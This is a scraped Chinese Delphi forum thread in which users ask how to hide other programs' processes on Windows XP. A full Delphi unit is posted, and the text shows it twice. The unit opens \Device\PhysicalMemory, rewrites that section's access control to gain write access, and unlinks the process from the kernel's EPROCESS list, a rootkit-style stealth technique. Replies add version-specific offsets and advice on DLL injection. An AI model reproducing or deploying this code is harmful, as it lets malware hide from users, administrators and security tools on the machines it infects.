用delphi 写个隐藏其它程序的工具 本帖最后由 zhangqiwen 于 2009-06-26 02:07:44 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 这些方法好像确实跟系统有关。网上常见的方法都是针对win2000以上版本的,win98的方法有差别,虽然现在win98用的人少了,但是如果你真的要考虑这一块,建议在程序前加段代码,用来判断系统的版本,然后再调用不同的方法来操作 你说的那个隐藏进程应该是改EProcess的双向链表实现的吧?微软没有公开EProcess的结构,各个系统之间的EProcess结构也可能有差别,所以这个方法并不通用。如果只是在任务管理器当中隐藏,DLL注入就行了,不用费这么大力气 有例子吗? 网上流传的那个pas文件在有的电脑确实能隐藏(同为xp,有的不行), 我就是把他包含到dll文件注入目标的. 另外我只需要在xp系统下能隐藏就可以了.我下了些其它隐藏进程的工具,发现都能用....我试的不能隐藏的,它也行. unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationuses Windows, Classes, AclAPI, accCtrl;type NTSTATUS = LongInt;const //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004); STATUS_ACCESS_DENIED = NTSTATUS($C0000022); OBJ_INHERIT = $00000002; OBJ_PERMANENT = $00000010; OBJ_EXCLUSIVE = $00000020; OBJ_CASE_INSENSITIVE = $00000040; OBJ_OPENIF = $00000080; OBJ_OPENLINK = $00000100; OBJ_KERNEL_HANDLE = $00000200; OBJ_VALID_ATTRIBUTES = $000003F2;type PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK; IO_STATUS_BLOCK = record Status: NTSTATUS; FObject: DWORD; end; PUNICODE_STRING = ^UNICODE_STRING; UNICODE_STRING = record Length: Word; MaximumLength: Word; Buffer: PWideChar; end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES; OBJECT_ATTRIBUTES = record Length: DWORD; RootDirectory: Pointer; ObjectName: PUNICODE_STRING; Attributes: DWORD; SecurityDescriptor: Pointer; SecurityQualityOfService: Pointer; end; TZwOpenSection = function(SectionHandle: PHandle; DesiredAccess: ACCESS_MASK; ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall; TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING; SourceString: PWideChar); stdcall;var RtlInitUnicodeString: TRTLINITUNICODESTRING = nil; ZwOpenSection: TZwOpenSection = nil; g_hNtDLL: THandle = 0; g_pMapPhysicalMemory: Pointer = nil; g_hMPM: THandle = 0; g_hMPM2: THandle = 0; g_osvi: OSVERSIONINFO; b_hide: Boolean = false; //---------------------------------------------------------------------------function InitNTDLL: Boolean;begin g_hNtDLL := LoadLibrary('ntdll.dll'); if 0 = g_hNtDLL then begin Result := false; Exit; end; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString'); ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection'); Result := True;end;//---------------------------------------------------------------------------procedure CloseNTDLL;begin if (0 <> g_hNtDLL) then FreeLibrary(g_hNtDLL); g_hNtDLL := 0;end;//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);var pDacl: PACL; pSD: PPSECURITY_DESCRIPTOR; pNewDacl: PACL; dwRes: DWORD; ea: EXPLICIT_ACCESS;begin pDacl := nil; pSD := nil; pNewDacl := nil; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions := SECTION_MAP_WRITE; ea.grfAccessMode := GRANT_ACCESS; ea.grfInheritance := NO_INHERITANCE; ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME; ea.Trustee.TrusteeType := TRUSTEE_IS_USER; ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end; dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil); if ERROR_SUCCESS <> dwRes then begin if Assigned(pSD) then LocalFree(Hlocal(pSD^)); if Assigned(pNewDacl) then LocalFree(Hlocal(pNewDacl)); end;end;//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;var Status: NTSTATUS; physmemString: UNICODE_STRING; Attributes: OBJECT_ATTRIBUTES; PhyDirectory: DWORD;begin g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO); GetVersionEx(g_osvi); if (5 <> g_osvi.dwMajorVersion) then begin Result := 0; Exit; end; case g_osvi.dwMinorVersion of 0: PhyDirectory := $30000; 1: PhyDirectory := $39000; else begin Result := 0; Exit; end; end; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory'); Attributes.Length := sizeof(OBJECT_ATTRIBUTES); Attributes.RootDirectory := nil; Attributes.ObjectName := @physmemString; Attributes.Attributes := 0; Attributes.SecurityDescriptor := nil; Attributes.SecurityQualityOfService := nil; Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes); if (Status = STATUS_ACCESS_DENIED) then begin ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @Attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes); end; if not (LongInt(Status) >= 0) then begin Result := 0; Exit; end; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000); if (g_pMapPhysicalMemory = nil) then begin Result := 0; Exit; end; Result := g_hMPM;end;//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;var VAddr, PGDE, PTE, PAddr, tmp: DWORD;begin VAddr := DWORD(addr); // PGDE := BaseAddress[VAddr shr 22]; PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * sizeof(ULONG))^; // modify by dot. if 0 = (PGDE and 1) then begin Result := nil; Exit; end; tmp := PGDE and $00000080; if (0 <> tmp) then begin PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF); end else begin PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000)); // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12]; PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * sizeof(DWORD))^; // modify by dot. if (0 = (PTE and 1)) then begin Result := nil; Exit; end; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF); UnmapViewOfFile(Pointer(PGDE)); end; Result := Pointer(PAddr);end;//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;var phys, ret: DWORD; tmp: PDWORD;begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then begin Result := 0; Exit; end; // ret := tmp[(phys and $FFF) shr 2]; ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^; // modify by dot. UnmapViewOfFile(tmp); Result := ret;end;//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;var phys: DWORD; tmp: PDWORD;begin phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr))); tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then begin Result := false; Exit; end; // tmp[(phys and $FFF) shr 2] := data; PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^ := data; // modify by dot. UnmapViewOfFile(tmp); Result := True;end;//---------------------------------------------------------------------------{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)beginExitProcess(0);return 1 ;end }//---------------------------------------------------------------------------function YHideProcess: Boolean;var thread, process: DWORD; fw, bw: DWORD;begin // SetUnhandledExceptionFilter(exeception); if (false = InitNTDLL) then begin Result := false; Exit; end; if (0 = OpenPhysicalMemory) then begin Result := false; Exit; end; thread := GetData(Pointer($FFDFF124)); //kteb process := GetData(Pointer(thread + $44)); //kpeb if (0 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $A0)); bw := GetData(Pointer(process + $A4)); SetData(Pointer(fw + 4), bw); SetData(Pointer(bw), fw); Result := True; end else if (1 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $88)); bw := GetData(Pointer(process + $8C)); SetData(Pointer(fw + 4), bw); SetData(Pointer(bw), fw); Result := True; end else begin Result := false; end; CloseHandle(g_hMPM); CloseNTDLL;end;function MyHideProcess: Boolean;begin if not b_hide then begin b_hide := YHideProcess; end; Result := b_hide;end;end. 上面那个就是改EProcess实现的,EProcess结构不同,XP SP2的偏移是$88和$8C,其他的版本就不清楚了 那是因为EProcess各个版本中的结构不同,XP SP2的偏移就是上面,但其他版本不同,必须自己调试得到偏移地址 OD不行,这个需要用到内核级调试器,比如WinDBG,具体用法网上有很多资料可以参考 下载个winopertor窗口手术师研究一下. delete * from AA 怎么回事哦 切忌浮躁。看delphi自带的pas文件。问2个函数。 対文件中的数据進行「Group by」 错误信息 求教,如何动态修改access数据库的表结构? 關于開啟子窗口的問題(代碼如下)﹐報錯 一个关于MIDAS的菜鸟问题,为何无法写入? 用ADO连接数据库 Delphi参数问题 delphi程序员薪水大公开 菜鸟虚心请教,关于发送封包问题,请各位赐教!!!!!谢谢!!! delphi 读取指针数组的数据问题
如果只是在任务管理器当中隐藏,DLL注入就行了,不用费这么大力气
有例子吗? 网上流传的那个pas文件在有的电脑确实能隐藏(同为xp,有的不行), 我就是把他包含到dll文件注入目标的. 另外我只需要在xp系统下能隐藏就可以了.我下了些其它隐藏进程的工具,发现都能用....我试的不能隐藏的,它也行.
Windows,
Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end; PUNICODE_STRING = ^UNICODE_STRING;
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end; TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
g_hNtDLL: THandle = 0;
g_pMapPhysicalMemory: Pointer = nil;
g_hMPM: THandle = 0;
g_hMPM2: THandle = 0;
g_osvi: OSVERSIONINFO;
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
begin
g_hNtDLL := LoadLibrary('ntdll.dll'); if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection'); Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end; dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(Hlocal(pNewDacl));
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
var
Status: NTSTATUS;
physmemString: UNICODE_STRING;
Attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi); if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end; case g_osvi.dwMinorVersion of
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory'); Attributes.Length := sizeof(OBJECT_ATTRIBUTES);
Attributes.RootDirectory := nil;
Attributes.ObjectName := @physmemString;
Attributes.Attributes := 0;
Attributes.SecurityDescriptor := nil;
Attributes.SecurityQualityOfService := nil; Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes); if (Status = STATUS_ACCESS_DENIED) then
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @Attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM); Status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @Attributes);
end; if not (LongInt(Status) >= 0) then
begin
Result := 0;
Exit;
end; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000); if (g_pMapPhysicalMemory = nil) then
begin
Result := 0;
Exit;
end; Result := g_hMPM;
end;
//---------------------------------------------------------------------------function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// PGDE := BaseAddress[VAddr shr 22];
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * sizeof(ULONG))^; // modify by dot. if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end; tmp := PGDE and $00000080; if (0 <> tmp) then
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * sizeof(DWORD))^; // modify by dot. if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end; Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := 0;
Exit;
end; // ret := tmp[(phys and $FFF) shr 2];
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^; // modify by dot.
UnmapViewOfFile(tmp); Result := ret;
end;
//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := false;
Exit;
end; // tmp[(phys and $FFF) shr 2] := data;
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * sizeof(DWORD))^ := data; // modify by dot.
UnmapViewOfFile(tmp); Result := True;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess: Boolean;
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (false = InitNTDLL) then
begin
Result := false;
Exit;
end; if (0 = OpenPhysicalMemory) then
begin
Result := false;
Exit;
end; thread := GetData(Pointer($FFDFF124)); //kteb
process := GetData(Pointer(thread + $44)); //kpeb if (0 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := True;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := True;
end
else
begin
Result := false;
end; CloseHandle(g_hMPM);
CloseNTDLL;
end;function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end; Result := b_hide;
end;end.